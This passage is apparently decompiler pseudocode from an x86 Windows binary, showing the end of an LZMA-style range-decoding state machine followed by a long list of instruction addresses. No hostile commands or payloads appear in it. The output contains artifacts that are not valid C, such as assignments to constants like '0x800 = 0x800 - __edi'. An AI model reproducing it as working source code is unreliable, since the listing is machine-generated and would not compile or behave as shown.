                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t208 =  &_v116;
                                                          							 *_t208 = _v116 + 1;
                                                          							__eflags =  *_t208;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L62:
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								L57:
                                                          								__al = _v72;
                                                          								_v96 = _v72;
                                                          								goto L58;
                                                          							}
                                                          							L63:
                                                          							__eax = _v92;
                                                          							__edx = __ebx + __ebx;
                                                          							__ecx = _v20;
                                                          							__esi = __edx + __eax;
                                                          							__ecx = _v20 >> 0xb;
                                                          							__ax =  *__esi;
                                                          							_v88 = __esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                          							__eflags = _v16 - __ecx;
                                                          							if(_v16 >= __ecx) {
                                                          								_v20 = _v20 - __ecx;
                                                          								_v16 = _v16 - __ecx;
                                                          								__cx = __ax;
                                                          								_t222 = __edx + 1; // 0x1
                                                          								__ebx = _t222;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								_v20 = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							_v72 = __ebx;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L62;
                                                          							} else {
                                                          								goto L60;
                                                          							}
                                                          						case 0x10:
                                                          							L112:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0x10;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t371 =  &_v116;
                                                          							 *_t371 = _v116 + 1;
                                                          							__eflags =  *_t371;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							goto L114;
                                                          						case 0x11:
                                                          							L71:
                                                          							__esi = _v92;
                                                          							_v136 = 0x12;
                                                          							goto L135;
                                                          						case 0x12:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v92;
                                                          								_v136 = 0x13;
                                                          								__esi = _v92 + 2;
                                                          								L135:
                                                          								_v88 = _t626;
                                                          								goto L136;
                                                          							}
                                                          							__eax = _v80;
                                                          							_v52 = _v52 & 0x00000000;
                                                          							__ecx = _v92;
                                                          							__eax = _v80 << 4;
                                                          							__eflags = __eax;
                                                          							__eax = _v92 + __eax + 4;
                                                          							goto L133;
                                                          						case 0x13:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								_t475 =  &_v92;
                                                          								 *_t475 = _v92 + 0x204;
                                                          								__eflags =  *_t475;
                                                          								_v52 = 0x10;
                                                          								_v68 = 8;
                                                          								L147:
                                                          								_v128 = 0x14;
                                                          								goto L148;
                                                          							}
                                                          							__eax = _v80;
                                                          							__ecx = _v92;
                                                          							__eax = _v80 << 4;
                                                          							_v52 = 8;
                                                          							__eax = _v92 + (_v80 << 4) + 0x104;
                                                          							L133:
                                                          							_v92 = __eax;
                                                          							_v68 = 3;
                                                          							goto L147;
                                                          						case 0x14:
                                                          							_v52 = _v52 + __ebx;
                                                          							__eax = _v132;
                                                          							goto L143;
                                                          						case 0x15:
                                                          							__eax = 0;
                                                          							__eflags = _v60 - 7;
                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          							__al = __al & 0x000000fd;
                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                          							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                          							goto L123;
                                                          						case 0x16:
                                                          							__eax = _v52;
                                                          							__eflags = __eax - 4;
                                                          							if(__eax >= 4) {
                                                          								_push(3);
                                                          								_pop(__eax);
                                                          							}
                                                          							__ecx = _v8;
                                                          							_v68 = 6;
                                                          							__eax = __eax << 7;
                                                          							_v128 = 0x19;
                                                          							_v92 = __eax;
                                                          							goto L148;
                                                          						case 0x17:
                                                          							L148:
                                                          							__eax = _v68;
                                                          							_v84 = 1;
                                                          							_v76 = _v68;
                                                          							goto L152;
                                                          						case 0x18:
                                                          							L149:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0x18;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t490 =  &_v116;
                                                          							 *_t490 = _v116 + 1;
                                                          							__eflags =  *_t490;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L151:
                                                          							_t493 =  &_v76;
                                                          							 *_t493 = _v76 - 1;
                                                          							__eflags =  *_t493;
                                                          							L152:
                                                          							__eflags = _v76;
                                                          							if(_v76 <= 0) {
                                                          								__ecx = _v68;
                                                          								__ebx = _v84;
                                                          								0 = 1;
                                                          								__eax = 1 << __cl;
                                                          								__ebx = _v84 - (1 << __cl);
                                                          								__eax = _v128;
                                                          								_v72 = __ebx;
                                                          								L143:
                                                          								_v140 = _t561;
                                                          								goto L3;
                                                          							}
                                                          							__eax = _v84;
                                                          							_v20 = _v20 >> 0xb;
                                                          							__edx = _v84 + _v84;
                                                          							__eax = _v92;
                                                          							__esi = __edx + __eax;
                                                          							_v88 = __esi;
                                                          							__ax =  *__esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                          							__eflags = _v16 - __ecx;
                                                          							if(_v16 >= __ecx) {
                                                          								_v20 = _v20 - __ecx;
                                                          								_v16 = _v16 - __ecx;
                                                          								__cx = __ax;
                                                          								__cx = __ax >> 5;
                                                          								__eax = __eax - __ecx;
                                                          								__edx = __edx + 1;
                                                          								__eflags = __edx;
                                                          								 *__esi = __ax;
                                                          								_v84 = __edx;
                                                          							} else {
                                                          								_v20 = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								_v84 = _v84 << 1;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L151;
                                                          							} else {
                                                          								goto L149;
                                                          							}
                                                          						case 0x19:
                                                          							__eflags = __ebx - 4;
                                                          							if(__ebx < 4) {
                                                          								_v48 = __ebx;
                                                          								L122:
                                                          								_t399 =  &_v48;
                                                          								 *_t399 = _v48 + 1;
                                                          								__eflags =  *_t399;
                                                          								L123:
                                                          								__eax = _v48;
                                                          								__eflags = __eax;
                                                          								if(__eax == 0) {
                                                          									_v52 = _v52 | 0xffffffff;
                                                          									goto L173;
                                                          								}
                                                          								__eflags = __eax - _v100;
                                                          								if(__eax > _v100) {
                                                          									goto L174;
                                                          								}
                                                          								_v52 = _v52 + 2;
                                                          								__eax = _v52;
                                                          								_t406 =  &_v100;
                                                          								 *_t406 = _v100 + _v52;
                                                          								__eflags =  *_t406;
                                                          								goto L126;
                                                          							}
                                                          							__ecx = __ebx;
                                                          							__eax = __ebx;
                                                          							__ecx = __ebx >> 1;
                                                          							__eax = __ebx & 0x00000001;
                                                          							__ecx = (__ebx >> 1) - 1;
                                                          							__al = __al | 0x00000002;
                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                          							__eflags = __ebx - 0xe;
                                                          							_v48 = __eax;
                                                          							if(__ebx >= 0xe) {
                                                          								__ebx = 0;
                                                          								_v76 = __ecx;
                                                          								L105:
                                                          								__eflags = _v76;
                                                          								if(_v76 <= 0) {
                                                          									__eax = __eax + __ebx;
                                                          									_v68 = 4;
                                                          									_v48 = __eax;
                                                          									__eax = _v8;
                                                          									__eax = _v8 + 0x644;
                                                          									__eflags = __eax;
                                                          									L111:
                                                          									__ebx = 0;
                                                          									_v92 = __eax;
                                                          									_v84 = 1;
                                                          									_v72 = 0;
                                                          									_v76 = 0;
                                                          									L115:
                                                          									__eax = _v68;
                                                          									__eflags = _v76 - _v68;
                                                          									if(_v76 >= _v68) {
                                                          										_t397 =  &_v48;
                                                          										 *_t397 = _v48 + __ebx;
                                                          										__eflags =  *_t397;
                                                          										goto L122;
                                                          									}
                                                          									__eax = _v84;
                                                          									_v20 = _v20 >> 0xb;
                                                          									__edi = _v84 + _v84;
                                                          									__eax = _v92;
                                                          									__esi = __edi + __eax;
                                                          									_v88 = __esi;
                                                          									__ax =  *__esi;
                                                          									__ecx = __ax & 0x0000ffff;
                                                          									__edx = (_v20 >> 0xb) * __ecx;
                                                          									__eflags = _v16 - __edx;
                                                          									if(_v16 >= __edx) {
                                                          										__ecx = 0;
                                                          										_v20 = _v20 - __edx;
                                                          										__ecx = 1;
                                                          										_v16 = _v16 - __edx;
                                                          										__ebx = 1;
                                                          										__ecx = _v76;
                                                          										__ebx = 1 << __cl;
                                                          										__ecx = 1 << __cl;
                                                          										__ebx = _v72;
                                                          										__ebx = _v72 | __ecx;
                                                          										__cx = __ax;
                                                          										__cx = __ax >> 5;
                                                          										__eax = __eax - __ecx;
                                                          										__edi = __edi + 1;
                                                          										__eflags = __edi;
                                                          										_v72 = __ebx;
                                                          										 *__esi = __ax;
                                                          										_v84 = __edi;
                                                          									} else {
                                                          										_v20 = __edx;
                                                          										0x800 = 0x800 - __ecx;
                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          										_v84 = _v84 << 1;
                                                          										 *__esi = __dx;
                                                          									}
                                                          									__eflags = _v20 - 0x1000000;
                                                          									if(_v20 >= 0x1000000) {
                                                          										L114:
                                                          										_t374 =  &_v76;
                                                          										 *_t374 = _v76 + 1;
                                                          										__eflags =  *_t374;
                                                          										goto L115;
                                                          									} else {
                                                          										goto L112;
                                                          									}
                                                          								}
                                                          								__ecx = _v16;
                                                          								__ebx = __ebx + __ebx;
                                                          								_v20 = _v20 >> 1;
                                                          								__eflags = _v16 - _v20;
                                                          								_v72 = __ebx;
                                                          								if(_v16 >= _v20) {
                                                          									__ecx = _v20;
                                                          									_v16 = _v16 - _v20;
                                                          									__ebx = __ebx | 0x00000001;
                                                          									__eflags = __ebx;
                                                          									_v72 = __ebx;
                                                          								}
                                                          								__eflags = _v20 - 0x1000000;
                                                          								if(_v20 >= 0x1000000) {
                                                          									L104:
                                                          									_t344 =  &_v76;
                                                          									 *_t344 = _v76 - 1;
                                                          									__eflags =  *_t344;
                                                          									goto L105;
                                                          								} else {
                                                          									goto L102;
                                                          								}
                                                          							}
                                                          							__edx = _v8;
                                                          							__eax = __eax - __ebx;
                                                          							_v68 = __ecx;
                                                          							__eax = _v8 + 0x55e + __eax * 2;
                                                          							goto L111;
                                                          						case 0x1a:
                                                          							L58:
                                                          							__eflags = _v104;
                                                          							if(_v104 == 0) {
                                                          								_v140 = 0x1a;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v108;
                                                          							__al = _v96;
                                                          							__edx = _v12;
                                                          							_v100 = _v100 + 1;
                                                          							_v108 = _v108 + 1;
                                                          							_v104 = _v104 - 1;
                                                          							 *_v108 = __al;
                                                          							__ecx = _v24;
                                                          							 *(_v12 + __ecx) = __al;
                                                          							__eax = __ecx + 1;
                                                          							__edx = 0;
                                                          							_t197 = __eax % _v120;
                                                          							__eax = __eax / _v120;
                                                          							__edx = _t197;
                                                          							goto L82;
                                                          						case 0x1b:
                                                          							L78:
                                                          							__eflags = _v104;
                                                          							if(_v104 == 0) {
                                                          								_v140 = 0x1b;
                                                          								goto L173;
                                                          							}
                                                          							__eax = _v24;
                                                          							__eax = _v24 - _v48;
                                                          							__eflags = __eax - _v120;
                                                          							if(__eax >= _v120) {
                                                          								__eax = __eax + _v120;
                                                          								__eflags = __eax;
                                                          							}
                                                          							__edx = _v12;
                                                          							__cl =  *(__edx + __eax);
                                                          							__eax = _v24;
                                                          							_v96 = __cl;
                                                          							 *(__edx + __eax) = __cl;
                                                          							__eax = __eax + 1;
                                                          							__edx = 0;
                                                          							_t280 = __eax % _v120;
                                                          							__eax = __eax / _v120;
                                                          							__edx = _t280;
                                                          							__eax = _v108;
                                                          							_v100 = _v100 + 1;
                                                          							_v108 = _v108 + 1;
                                                          							_t289 =  &_v104;
                                                          							 *_t289 = _v104 - 1;
                                                          							__eflags =  *_t289;
                                                          							 *_v108 = __cl;
                                                          							L82:
                                                          							_v24 = __edx;
                                                          							goto L83;
                                                          						case 0x1c:
                                                          							while(1) {
                                                          								L126:
                                                          								__eflags = _v104;
                                                          								if(_v104 == 0) {
                                                          									break;
                                                          								}
                                                          								__eax = _v24;
                                                          								__eax = _v24 - _v48;
                                                          								__eflags = __eax - _v120;
                                                          								if(__eax >= _v120) {
                                                          									__eax = __eax + _v120;
                                                          									__eflags = __eax;
                                                          								}
                                                          								__edx = _v12;
                                                          								__cl =  *(__edx + __eax);
                                                          								__eax = _v24;
                                                          								_v96 = __cl;
                                                          								 *(__edx + __eax) = __cl;
                                                          								__eax = __eax + 1;
                                                          								__edx = 0;
                                                          								_t420 = __eax % _v120;
                                                          								__eax = __eax / _v120;
                                                          								__edx = _t420;
                                                          								__eax = _v108;
                                                          								_v108 = _v108 + 1;
                                                          								_v104 = _v104 - 1;
                                                          								_v52 = _v52 - 1;
                                                          								__eflags = _v52;
                                                          								 *_v108 = __cl;
                                                          								_v24 = _t420;
                                                          								if(_v52 > 0) {
                                                          									continue;
                                                          								} else {
                                                          									L83:
                                                          									_v140 = 2;
                                                          									goto L3;
                                                          								}
                                                          							}
                                                          							_v140 = 0x1c;
                                                          							L173:
                                                          							_push(0x22);
                                                          							_pop(_t574);
                                                          							memcpy(_v148,  &_v140, _t574 << 2);
                                                          							return 0;
                                                          					}
                                                          				}
                                                          				L174:
                                                          				_t538 = _t537 | 0xffffffff;
                                                          				return _t538;
                                                          			}










































                                                          0x00406bc0
                                                          0x00406bc7
                                                          0x00406bcd
                                                          0x00406bd3
                                                          0x00000000
                                                          0x00406bd7
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bf9
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c0e
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c59
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c5e
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c76
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406ccd
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd2
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cef
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d35
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073dd
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x00407413
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741c
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x00000000
                                                          0x004075cf
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743b
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00407441
                                                          0x00407441
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x00000000
                                                          0x00406dec
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406dcf
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x00000000
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x00000000
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x00000000
                                                          0x00407137
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x00000000
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
